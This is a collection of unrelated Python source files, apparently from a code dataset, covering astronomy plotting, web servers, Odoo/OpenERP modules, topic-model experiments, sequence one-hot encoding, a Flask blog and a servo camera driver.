+{"seq_id":"140962858","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nimport sys\nfrom scipy.stats import kde\nimport matplotlib.gridspec as gridspec\nfrom collections import OrderedDict\nfrom matplotlib import colors\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy import units as u\nimport seaborn as sns\nimport shapely.geometry as geom\n\ncosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Om0=0.3)\n\nwd='/Users/alberto/Desktop/XBOOTES/'\ndate = '200113'\np_any_cut=0.31\n\n# Open the matched master catalog (-cp version contains only one CDWFS source per line) \n# 6800 sources \n#cat=fits.open('/Users/alberto/Downloads/nway-master/cdwfs_I-Ks-3.6-cp.fits')\ncat=fits.open(wd+'CDWFS_I-Ks-3.6_v'+date+'.fits')\ndata=cat[1].data\ncols=cat[1].columns\nnames=cols.names\npany=data['p_any']\n\ncrf = data['CDWFS_CR_F']\nff = data['CDWFS_FLUX_F']\ncrs = data['CDWFS_CR_S']\nfs = data['CDWFS_FLUX_S']\ncrh = data['CDWFS_CR_H']\nfh = data['CDWFS_FLUX_H']\nhr0 = data['CDWFS_HR']\nehr0p = data['CDWFS_E_HR_+']\nehr0n = data['CDWFS_E_HR_-']\nzspec0=data['zsp']\nzph_g0=data['zph_G']\nchi_g0=data['chi2_G']\nzph_ga0=data['zph_G+A']\nchi_ga0=data['chi2_G+A']\nebv0=data['E_B-V']\nchi_s0=data['chi2_S']\n\n# Array of 6800 srcs\nz = np.full_like(zph_ga0,zph_ga0)\nztype = np.full_like(zph_ga0,0)\n\nz[(chi_g0 < chi_ga0) & (chi_g0!=-99)] = zph_g0[(chi_g0 < chi_ga0) & (chi_g0!=-99)]\nz[zspec0 != -99] = zspec0[zspec0 != -99]\nztype[zspec0 != -99] = 1\nztype[z==-99] = -99\nwhat=np.full_like(chi_g0,'A',dtype='str')\nwhat[(chi_g0p_any_cut]\nztype = ztype[pany>p_any_cut]\nfh = fh[pany>p_any_cut]\nfs = fs[pany>p_any_cut]\nnh = nh[pany>p_any_cut]\nks = ks[pany>p_any_cut]\nkh = kh[pany>p_any_cut]\nhr = hr0[pany>p_any_cut]\nwhat = what[pany>p_any_cut]\n\n# Cut for sources with redshift and NH\nmyz = z[ztype!=-99]\nmyfh = fh[ztype!=-99]\nmyfs = fs[ztype!=-99]\nmynh = nh[nh!=-99]\nmyks = ks[nh!=-99]\nmykh = kh[nh!=-99]\nmyhr = hr[nh!=-99]\nmywhat = what[ztype!=-99]\n\nprint(np.min(mynh),np.max(mynh))\nprint(np.min(myks),np.max(myks))\nprint(np.min(mykh),np.max(mykh))\n\nGAMMA = 1.8\nfh_int = myfh/mykh\nfs_int = myfs/myks\n\nfluxrestframe=myfh*(1+myz)**(GAMMA-2)\nfluxrestframe_int=fh_int*(1+myz)**(GAMMA-2)\ndl=cosmo.luminosity_distance(myz)\ndl2=dl.value*3.086e24 # from Mpc to cm\nlfull=4*3.141592*fluxrestframe*dl2**2\nlfull_int=4*3.141592*fluxrestframe_int*dl2**2\n\nlbins = np.logspace(41,46,12)\nzbins = np.logspace(-1,np.log10(5),15)\n\nobsc = mynh[mynh>=22]\nunob = mynh[mynh<22]\n\nz_obsc = myz[mynh>=22]\nz_unob = myz[mynh<22]\n\nl_obsc = lfull_int[mynh>=22]\nl_obsc_SM = lfull_int[myhr>-0.2] # As done by Stefano\nl_obsc_phot = lfull_int[mywhat=='G']\n\ntot,be=np.histogram(lfull_int,bins=lbins)\ntot_phot,be=np.histogram(lfull_int[(mywhat!='U') & (mywhat!='S')],bins=lbins)\n\nobs,be=np.histogram(l_obsc,bins=lbins)\nobs_SM,be=np.histogram(l_obsc_SM,bins=lbins)\nobs_phot,be0=np.histogram(l_obsc_phot,bins=lbins)\n\nbce = list((be[i+1]+be[i])/2. 
for i in range(len(be)-1))\n\nobsc_fraction = obs/tot\nobsc_fraction_SM = obs_SM/tot\nobsc_fraction_phot = obs_phot/tot_phot\n\nplt.figure()\nplt.plot(bce, obsc_fraction, 'c*',label='NH-HR')\nplt.plot(bce, obsc_fraction_SM, 'gD',label='HR cut')\nplt.plot(bce, obsc_fraction_phot, 'rs',label='Photometric classification')\n#plt.hist(l_obsc,bins=lbins,alpha=0.6,label='OBSCURED')\n#plt.hist(l_unob,bins=lbins,alpha=0.6,label='UNOBSCURED')\nplt.xscale('log')\nplt.legend()\nplt.axis([1e42,1e45,0,1])\nplt.show()\n\nsys.exit()\n\nzz=np.logspace(np.log10(1e-4),np.log10(5),100)\nflim=3e-15\nflimrestframe=flim*((1+zz)**(GAMMA-2))\ndl=cosmo.luminosity_distance(zz)\ndl2=dl.value*3.086e24 # from Mpc to cm\nl=flimrestframe*4*3.141592*dl2**2\n\n(x,y)=np.genfromtxt('/Users/alberto/Desktop/XBOOTES/aird_lstar_un.dat',unpack=True)\n(x2,y2)=np.genfromtxt('/Users/alberto/Desktop/XBOOTES/aird_lstar_ob.dat',unpack=True)\n\nlstar_un=10**(y)\nlstar_ob=10**(y2)\nz1=10**(x)-1\nz2=10**(x2)-1\n\nplt.figure(figsize=[7,7])\n\n#plt.plot(ztot[new==0],lfull[new==0],'.',color='tomato',zorder=-1,alpha=0.5)\n#plt.plot(ztot[new==1],lfull[new==1],'.',color='dodgerblue',alpha=0.5)\n#plt.plot(myz,lfull,'.',color='dodgerblue',alpha=0.5)\nplt.plot(myz,lfull_int,'.',color='tomato',alpha=0.5)\n\nplt.plot(zz,l,'k--')\n\nplt.plot(z1,lstar_un,color='lime',linestyle='dashed',linewidth=3,label='A15 Unobscured')\nplt.plot(z2,lstar_ob,color='yellow',linestyle='dashed',linewidth=3,label='A15 Obscured')\n#plt.xscale('log')\nplt.yscale('log')\nplt.xlabel('Redshift',fontsize=20)\nplt.ylabel(r'$L_{0.5-7}$ (erg/s)',fontsize=20)\nplt.axis([0.05,5,5e39,1e46])\nplt.tick_params(which='major',direction='inout',length=8,labelsize=15)\nplt.xticks(ticks=[0.1,1,2,3,4,5],labels=[0.1,1,2,3,4,5])\n#plt.annotate(r'$N=$'+str(len(ztot)),xy=(0.02,5e44))\nplt.legend(loc='lower right')\nplt.tight_layout()\nplt.show()\n","sub_path":"cdwfs_nh.py","file_name":"cdwfs_nh.py","file_ext":"py","file_size_in_byte":9152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"244737644","text":"\"\"\"\nRuns the glyphs server\n\"\"\"\nfrom contextlib import contextmanager\nimport os\nimport sys\n\nfrom codado.tx import Main\n\nfrom twisted.internet import reactor, endpoints, defer\nfrom twisted.python import log as tlog\nfrom twisted.web.server import Site\n\nfrom glyphs import db\nfrom glyphs.const import GLYPHS_DB_CONNECT\nfrom glyphs.server import Server\n\n\nLOG_DIR = './http'\nLOG_PATH = '%s/http-requests.log' % LOG_DIR\nDEFAULT_PORT = int(os.environ.get(\"PORT\")) if os.environ.get(\"PORT\") else 8080\n\n\nclass Run(Main):\n \"\"\"\n Command that runs the glyphs server\n \"\"\"\n synopsis = \"run\"\n\n callLater = reactor.callLater\n\n def postOptions(self):\n \"\"\"\n Start logging and run the webserver\n \"\"\"\n tlog.startLogging(sys.stdout)\n\n with createWeb() as webFactory:\n epWeb = endpoints.serverFromString(reactor, 'tcp:%s' % DEFAULT_PORT)\n dWeb = epWeb.listen(webFactory)\n\n def giveUp(f):\n f.printTraceback()\n self.callLater(0, reactor.stop)\n\n dl = defer.DeferredList([dWeb,], fireOnOneErrback=True).addErrback(giveUp)\n reactor.run()\n return dl\n\n\n@contextmanager\ndef createWeb():\n \"\"\"\n Create a factory for starting the website\n \"\"\"\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n with db.connection(GLYPHS_DB_CONNECT):\n yield Site(Server().app.resource(), logPath=LOG_PATH)\n\n\nRun.main()\n","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523312183","text":"# Ejercicio1\n# A partir de los arrays x y fx calcule la segunda derivada de fx con respecto a x. \n# Esto lo debe hacer sin usar ciclos 'for' ni 'while'.\n# Guarde esta segunda derivada en funcion de x en una grafica llamada 'segunda.png'\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(0,2.,10)\nfx = np.array([0., 0.0494, 0.1975, 0.4444, 0.7901,1.2346 , 1.7778, 2.4198, 3.1605, 4.])\n\ndef segundaDer(a,b):\n segundaDerivada= ((a+1)+2*a*b-(b-1)**2)/(a**2)\n return segundaDerivada\n\nprint (segundaDer(x,fx))\n\n#plt.plot(x,segundaDer(x,fx))\n#plt.grid()\n#plt.savefig('segunda.png')\n\n\n\n\n","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"491185218","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.fields import Float, Char, Many2one, One2many, Many2many, Integer, Boolean, Datetime, Selection, Text\nfrom openerp.models import Model, api, _, AbstractModel\nimport openerp\n\n\nclass ir_logging(Model):\n\n _inherit = 'ir.logging'\n\n levels_order = {'debug': 0,\n 'info': 1,\n 'warn': 2,\n 'error': 3,\n 'fatal': 4,\n }\n @api.one\n def _get_source_model(self):\n return None\n\n @api.multi\n def get_trimmed_message(self, message):\n\n if len(message) > 100:\n message = message[0:100] + '...'\n else:\n message = message[0:len(message)]\n \n return message\n\n level = Selection([('debug', 'Debug'),\n ('info', 'Information'),\n ('warn', 'Warning'),\n ('error', 'Error'),\n ('fatal', 'Fatal'), ], 'Level')\n model = Char('Model', size=64, required=True, select=1)\n model_name = Char('Model Name', size=64)\n model_id = Integer('Record ID', select=1, help=\"ID of the target record in the database\")\n source = Many2one('ir.model', compute='_get_source_model', string=\"Entity concern\")\n user = Many2one('res.users', 'User')\n\n \n\n @api.model\n def create(self, values):\n if not values.get('name'):\n values['name'] = self.get_trimmed_message(values.get('message'))\n\n if not values.get('line'):\n values['line'] = 1\n\n if not values.get('func'):\n values['func'] = 'func'\n\n if not values.get('path'):\n values['path'] = 'path'\n\n if not values.get('type'):\n values['type'] = 'server'\n\n db = openerp.sql_db.db_connect(self._cr.dbname)\n cursor = db.cursor(serialized=False)\n cursor.autocommit(True)\n self = self.with_env(self.env(cr=cursor))\n\n log_level = self.env.ref('log_extension.log_level')\n\n if self.levels_order.get((values.get('level', 'info'))) >= self.levels_order.get(log_level.value, 1):\n id = super(ir_logging, self).create(values)\n else:\n id = False\n cursor.commit()\n cursor.close()\n return id\n\n @api.multi\n def see_entity(self):\n\n return {'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self.model,\n 'context': {'init': True},\n 'res_id': self.model_id,\n }\n\nir_logging()\n\n\nclass mail_thread(AbstractModel):\n _name = 'mail.thread'\n _inherit = 'mail.thread'\n\n @api.model\n def log(self, model_id, message, level='debug', name='', model=None, user=None):\n data = {\n 'message': message,\n 'model_id': model_id,\n 'model': model or self._name,\n 'level': level,\n 'user': user or self._uid,\n 'name': name,\n }\n 
self.env['ir.logging'].create(data)\n","sub_path":"log_extension/log_extension.py","file_name":"log_extension.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"430287113","text":"# -*- encoding utf-8 -*-\n\nfrom odoo import _, api, fields, models\nimport base64\nimport io\nimport os\nimport logging\nfrom jinja2 import Environment, FileSystemLoader\nfrom collections import defaultdict\nfrom odoo.exceptions import UserError, ValidationError\n\ntype_account = {\n 'savings': 'AHO',\n 'checking': 'CTE',\n}\n\ntype_ident = {\n 'cedula': 'C',\n 'ruc': 'R',\n 'pasaporte':'P',\n}\n\nclass accountBatchPayment(models.Model):\n _inherit = 'account.batch.payment'\n\n report_bank = fields.Binary(string='Archivo Bancario', readonly=True)\n report_bank_name = fields.Char(string='Nombre Archivo Bancario', store=True)\n payment_method_code = fields.Char(string='Metodo de Pago',compute=\"payment_method_id.code\")\n\n def report_bank_transfer(self):\n dtc = []\n data = {'employees':''}\n for payment in self.payment_ids:\n partner = payment.partner_id\n bank_ids = self.env['res.partner.bank'].search([('partner_id','=',partner.id)])\n if not bank_ids:\n raise ValidationError(_(\"%s no tiene registrada una cuenta bancaria.\" % (partner.name)))\n bank_id = bank_ids[0]\n if bank_id:\n dtc.append({\n 'identifier':partner.identifier,\n 'amount':'%.2f'%(payment.amount),\n 'type_account':type_account[bank_id.account_type],\n 'account_number':bank_id.acc_number,\n 'reference': payment.communication or 'PAGO',\n 'phone':partner.phone or partner.mobile,\n 'month':payment.payment_date.month,\n 'year':payment.payment_date.year,\n 'type_identifier':type_ident[partner.type_identifier],\n 'name':partner.name,\n 'code':bank_id.bank_id.bic,\n })\n if not dtc:\n raise ValidationError(_(\"Ninguno de los empleados tiene asignada una cuenta bancaria.\"))\n data = {'employees':dtc}\n if self.journal_id.format_transfer_id:\n tmpl_path = os.path.join(os.path.dirname(__file__), 'template')\n env = Environment(loader=FileSystemLoader(tmpl_path))\n format_report = env.get_template(self.journal_id.format_transfer_id+'.xml')\n report = format_report.render(data)\n buf = io.StringIO()\n buf.write(report)\n out = base64.encodestring(buf.getvalue().encode('utf-8')).decode()\n logging.error(out)\n buf.close()\n self.report_bank = out\n self.report_bank_name = 'Transferencia %s.txt' % (self.journal_id.name)\n return out\n else:\n raise ValidationError(_(\"Primero debe configurar un formato de Transferencia Bancaria en el Diario.\"))","sub_path":"l10n_ec_batch_payment/model/account_batch_payment.py","file_name":"account_batch_payment.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"300937836","text":"import numpy as np\nimport os, re, sys\nfrom sklearn import metrics\n\nsys.path.insert(0, '/'.join(os.getcwd().split('/')[:-4]))\nimport myAUC\n\ndirnum = int(os.getcwd().split('/')[-1])-1\nprop = os.getcwd().split('/')[-2]\n\nload = 0\n\nseed0 = 1000001 + 100*dirnum\nnp.random.seed(seed0)\n\ndirpath = 'dir'\nos.system('mkdir -p %s' %dirpath)\nresfile = 'results.txt' \nfpres = open(resfile, 'w')\nfpres.write('M roc wrdlkh roc_macro roc_trans roc_macro_trans, fprAUC traintime\\n')\nfpres.close()\n\nCode = '../../../../../Code/SLDA/SSLDA'\nDatapath = '../../../../../Data/Ohsumed'\n\ntrfile = '%s/lda_train-data.dat' %Datapath\nif (prop != '1'):\n trlblfile = '%s/train-label%s.dat' %(Datapath,prop)\nelse:\n trlblfile = '%s/train-label.dat' %Datapath\ntfile = '%s/lda_test-data.dat' %Datapath\ntlblfile = '%s/test-label.dat' %Datapath\n#vfile = '%s/valid-data.dat' %Datapath\n#vlblfile = '%s/valid-label.dat' %Datapath\nvocabfile = '%s/vocabs.txt' %Datapath\n\ntrlbl = np.loadtxt(trlblfile)\ntlbl = np.loadtxt(tlblfile)\n(Dtr, C) = trlbl.shape\nDt = tlbl.shape[0]\nN = len(open(vocabfile).readlines())\nalpha = 0.1\nnu = 0.01\npsi = [2.0, 2.0]\nalpha_sigma = 0.3\nnu_sigma = 0.3\nM = 70\nT = 100\nBurnIn = 1500\nITER = 5\nconverged = 1e-3\n\n\n# training \nsettingfile = '%s/settings.txt' %dirpath\nfp = open(settingfile, 'w')\nfp.write('M %d\\nC %d\\nD %d\\nN %d\\nT %d\\nalpha %f\\nconverged %f' %(M,C,Dtr,N,T,alpha, converged))\nfp.close()\nseed = np.random.randint(seed0)\n\nif load == 0:\n\tcmdtxt = '%s %d train %s %s %s random %s' %(Code, seed, trfile, trlblfile, settingfile, dirpath)\nelse:\n\tcmdtxt = '%s %d train %s %s %s load %s %s/001' %(Code, seed, trfile, trlblfile, settingfile, dirpath, dirpath)\nprint(cmdtxt)\nos.system(cmdtxt)# + ' > /dev/null')\n\n# transductive learning:\nunlbld = np.where(trlbl[:,0]==-1)[0]\nif len(unlbld) > 0:\n\tb = np.loadtxt('%s/final.b' %dirpath)[unlbld,:]\n\tgtlbl_unlbld = np.loadtxt('%s/train-label.dat' %Datapath)[unlbld,:]\n\t(roc_trans, roc_macro_trans) = myAUC.compute_auc(b, gtlbl_unlbld)\nelse:\n\troc_trans = 0\n\troc_macro_trans = 0\n\ntrtime = np.loadtxt('%s/likelihood.dat' %dirpath)[-1,2]\n\n# test \nsettingfile = '%s/settings.txt' %dirpath\nfp = open(settingfile, 'w')\nfp.write('M %d\\nC %d\\nD %d\\nN %d\\nT %d\\nalpha %f\\nconverged %f' %(M,C,Dt,N,T,alpha, converged))\nfp.close()\nseed = np.random.randint(seed0)\n\ncmdtxt = '%s %d test %s %s %s/final %s' %(Code, seed, tfile, settingfile, dirpath, dirpath)\nos.system(cmdtxt)# + ' > /dev/null')\n\nwrdlkh = np.loadtxt('%s/test-lhood.dat' %dirpath)[1]\n\n# class prediction\ntlbl = np.loadtxt(tlblfile, dtype = np.int)\nypred = np.loadtxt('%s/testfinal.b' %dirpath)\n(roc, roc_macro) = myAUC.compute_auc(ypred, tlbl)\n\n# ThFprAUC for documents with no labels\nnolbld = np.where(np.sum(tlbl,1)==0)[0]\nif len(nolbld) > 0:\n\tTH = np.linspace(0,1,50)\n\tfpr = np.zeros(len(TH))\n\tfor t,th in enumerate(TH):\n\t\tpred = np.round(ypred[nolbld] > th)\n\t\ttn = np.sum((1-pred) == 1)\n\t\tfp = np.sum(pred == 1)\n\t\tfpr[t] = fp/float(fp+tn)\n\tfprAUC = metrics.auc(TH,fpr)\nelse:\n\tfprAUC = 0\n\nfpres = open(resfile, 'a')\nfpres.write('%d %f %f %f %f %f %f %f\\n' %(M, roc, wrdlkh, roc_macro, roc_trans, roc_macro_trans, fprAUC, trtime))\nfpres.close()\t\t\n\nos.system('rm -r dir')\n\n","sub_path":"Experiments/Ohsumed/SLDA/0.3/2/PyRun.py","file_name":"PyRun.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"160837462","text":"\"\"\"\nImplements TaxBrain \"Macroeconomic Elasticities Simulation\" dynamic analysis.\n\"\"\"\n# CODING-STYLE CHECKS:\n# pycodestyle macro_elasticity.py\n# pylint --disable=locally-disabled macro_elasticity.py\n\nfrom taxcalc.policy import Policy\n\n\ndef proportional_change_in_gdp(year, calc1, calc2, elasticity):\n '''\n This function harnesses econometric estimates of the historic relationship\n between tax policy and the macro economy to predict the effect of tax\n reforms on economic growth.\n\n In particular, this model relies on estimates of how GDP responds to\n changes in the average after tax rate on wage income across all taxpayers\n (one minus the average marginal tax rate, or 1-AMTR). These estimates are\n derived from calculations of income-weighted marginal tax rates under the\n baseline and reform. The reform-induced change in GDP in year t is\n assumed to be equal to the assumed elasticity times the absolute (not\n proportional) change in one minus the average marginal tax rate in\n year t-1. In other words, the current-year change in GDP is assumed to\n be related to the prior-year change in the average marginal tax rate.\n\n Empirical evidence on this elasticity can be found in Robert Barro\n and Charles Redlick, \"Macroeconomic Effects from Government Purchases\n and Taxes\" (2011 Quarterly Journal of Economics). A pre-publication\n version of this paper is available at the following URL:\n .\n In particular, Barro and Redlick find that a 1 percentage point decrease\n in the AMTR leads to a 0.54 percent increase in GDP. Evaluated at the\n sample mean, this translates to an elasticity of GDP with respect to the\n average after-tax marginal rate of about 0.36.\n\n A more recent paper by Karel Mertens and Jose L. Montiel Olea,\n entitled \"Marginal Tax Rates and Income: New Time Series Evidence\",\n NBER working paper 19171 (June 2013 with September 2017 revisions)\n , contains additional empirical\n evidence suggesting the elasticity is no less than the 0.36 Barro-\n Redlick estimate and perhaps somewhat higher (see section 4.6).\n Their summary of the Barro and Redlick findings (on page 5) are\n as follows: \"Barro and Redlick (2011) however find that a one\n percentage point cut in the AMTR raises per capita GDP by around\n 0.5% in the following year. 
This estimate is statistically\n significant and amounts to a short run GDP elasticity to the\n net-of-tax rate of 0.36\".\n\n Parameters\n ----------\n year : calendar year of the reform-induced proportion change in GDP\n calc1 : Calculator object for the pre-reform baseline for prior year\n calc2 : Calculator object for the policy reform for prior year\n elasticity: Float estimate of elasticity of GDP wrt 1-AMTR\n\n Returns\n -------\n Float estimate of proportional change in GDP induced by the reform\n Note that proportional means a relative change but it is not expressed\n in percentage terms\n '''\n assert elasticity >= 0.0\n assert calc1.current_year == calc2.current_year\n assert calc1.data_year == calc2.data_year\n if year <= max(Policy.JSON_START_YEAR, calc1.data_year):\n return 0.0 # because Calculator cannot simulate taxes in year-1\n if calc1.current_year != (year - 1):\n msg = 'calc.current_year={} must be one less than year={}'\n raise ValueError(msg.format(calc1.current_year, year))\n _, _, mtr_combined1 = calc1.mtr()\n _, _, mtr_combined2 = calc2.mtr()\n avg_mtr1 = ((mtr_combined1 * calc1.array('c00100') *\n calc1.array('s006')).sum()) / calc1.weighted_total('c00100')\n avg_mtr2 = ((mtr_combined2 * calc2.array('c00100') *\n calc2.array('s006')).sum()) / calc2.weighted_total('c00100')\n proportional_chg_in_rate = ((1.0 - avg_mtr2) / (1.0 - avg_mtr1)) - 1.0\n return elasticity * proportional_chg_in_rate\n","sub_path":"taxcalc/macro_elasticity.py","file_name":"macro_elasticity.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"250338963","text":"from numpy import array\nimport numpy as np\nfrom numpy import argmax\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nimport re\n\n\ndef encode_me(seq):\n # get sequence into an array\n seq_array = array(list(seq))\n\n # integer encode the sequence\n label_encoder = LabelEncoder()\n integer_encoded_seq = label_encoder.fit_transform(seq_array)\n\n # one hot the sequence\n onehot_encoder = OneHotEncoder(sparse=False)\n # reshape because that's what OneHotEncoder likes\n integer_encoded_seq = integer_encoded_seq.reshape(len(integer_encoded_seq), 1)\n onehot_encoded_seq = onehot_encoder.fit_transform(integer_encoded_seq)\n onehot_encoded_seq = array(onehot_encoded_seq)\n padded_array = np.zeros((41, 4))\n print(seq)\n padded_array[0:len(seq), :] = onehot_encoded_seq\n return padded_array\n\n\ndef one_hot_encode_(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((41, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_75(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((75, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_100(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((100, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_120(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((120, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_90(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((90, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array","sub_path":"common/one_hot.py","file_name":"one_hot.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"367066597","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy \r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__) \r\n\r\n#connecting flask-sqlalchemy with sqlite\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = r'sqlite:///C:\\Users\\User\\Documents\\GitHub\\flask_blog\\Database\\blog.db' \r\n\r\n#linking the database with the apps python file\r\n\r\ndb = SQLAlchemy(app) \r\n\r\nclass Blogpost(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(50))\r\n subtitle = db.Column(db.String(50)) #creating the blog database model\r\n author = db.Column(db.String(20))\r\n date_posted = db.Column(db.DateTime)\r\n content = db.Column(db.Text)\r\n\r\n#routing the blog webpages\r\n\r\n@app.route('/')\r\ndef index():\r\n posts = Blogpost.query.all()\r\n return render_template('index.html',posts = posts)\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/post/')\r\ndef post(post_id):\r\n\r\n post = Blogpost.query.filter_by(id=post_id).one()\r\n return render_template('post.html', post=post)\r\n\r\n@app.route('/add')\r\ndef add():\r\n return render_template('add.html')\r\n\r\n@app.route('/contact')\r\ndef contact():\r\n return render_template('contact.html')\r\n\r\n@app.route('/addpost', methods=['POST'])\r\ndef addpost():\r\n title =request.form['title']\r\n subtitle =request.form['subtitle']\r\n author =request.form['author']\r\n content =request.form['content']\r\n\r\n post = Blogpost(title=title,subtitle=subtitle,author=author,content=content,date_posted=datetime.now())\r\n\r\n #adding the data to the database table \r\n db.session.add(post)\r\n db.session.commit()\r\n\r\n return redirect(url_for('index'))\r\n \r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n\r\n\r\n \r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"199158752","text":"#!/usr/bin/python \r\n###########################################################################################\r\n# Filename: \r\n# LegacyCameraDriver.py\r\n###########################################################################################\r\n# Project Authors: \r\n# Juhapekka Piiroinen\r\n# Brian Wu\r\n# \r\n# Changes:\r\n# June 14, 2010 by Juhapekka Piiroinen - changes committed to svn\r\n# - added comments for the device commands according to the manual from Pololu\r\n# - added latest draft code for rotating base servo (Parallax Continuous Rotating Servo)\r\n# - note! you should be able to clear error flags with .get_errors function according to the manual\r\n# - renamed CameraDriver to LegacyCameraDriver as Brian Wu has done better one\r\n# - integrated batch of changes provided by Brian Wu\r\n#\r\n# June 11, 2010 by Brian Wu - Changes committed thru email\r\n# - Decoupling the implementation from the program\r\n#\r\n# April 19, 2010 by Juhapekka Piiroinen\r\n# - Initial Release\r\n# \r\n# Email:\r\n# juhapekka.piiroinen@gmail.com\r\n#\r\n# License: \r\n# GNU/GPLv3\r\n#\r\n# Description:\r\n# A python-wrapper for Pololu Micro Maestro 6-Channel USB Servo Controller\r\n#\r\n############################################################################################\r\n# /!\\ Notes /!\\\r\n# You will have to enable _USB Dual Port_ mode from the _Pololu Maestro Control Center_.\r\n#\r\n############################################################################################\r\n# Device Documentation is available @ http://www.pololu.com/docs/pdf/0J40/maestro.pdf\r\n############################################################################################\r\n# (C) 2010 Juhapekka Piiroinen\r\n# Brian Wu\r\n############################################################################################\r\nimport Device\r\n\r\nclass LegacyCameraDriver(object):\r\n def __init__(self,x_servo=0,y_servo=1,z_servo=2):\r\n self.x_servo = x_servo\r\n self.y_servo = y_servo\r\n self.z_servo = z_servo\r\n self.device = Device()\r\n self.device.set_acceleration(self.x_servo,10)\r\n self.device.set_speed(self.x_servo,10)\r\n self.device.set_acceleration(self.y_servo,10)\r\n self.device.set_speed(self.y_servo,10)\r\n self.device.set_acceleration(self.z_servo,10)\r\n self.device.set_speed(self.z_servo,10)\r\n self.device.go_home()\r\n\r\n def __del__(self):\r\n del(self.device)\r\n \r\n def status_report(self):\r\n return \"X: %s\\tY: %s\\tZ: %s\" % (self.device.get_position(self.x_servo),self.device.get_position(self.y_servo),self.device.get_position(self.z_servo))\r\n\r\n def pan(self,dx):\r\n x = self.device.get_position(self.x_servo)\r\n x += dx\r\n self.device.set_target(self.x_servo,x)\r\n self.device.wait_until_at_target()\r\n \r\n def tilt(self,dy):\r\n y = self.device.get_position(self.y_servo)\r\n y += dy\r\n self.device.set_target(self.y_servo,y)\r\n self.device.wait_until_at_target()\r\n\r\n def rotate(self,dz):\r\n z = self.device.get_position(self.z_servo)\r\n z += dz\r\n self.device.set_target(self.z_servo,z)\r\n self.device.wait_until_at_target()\r\n \r\n def goto(self,x,y,z=0):\r\n self.device.set_target(self.x_servo,x)\r\n self.device.set_target(self.y_servo,y)\r\n self.device.set_target(self.z_servo,z)\r\n self.device.wait_until_at_target()\r\n \r\n def reset(self):\r\n self.device.go_home()\r\n 
self.device.wait_until_at_target()\r\n","sub_path":"jpiimaestro/driver/LegacyCameraDriver.py","file_name":"LegacyCameraDriver.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
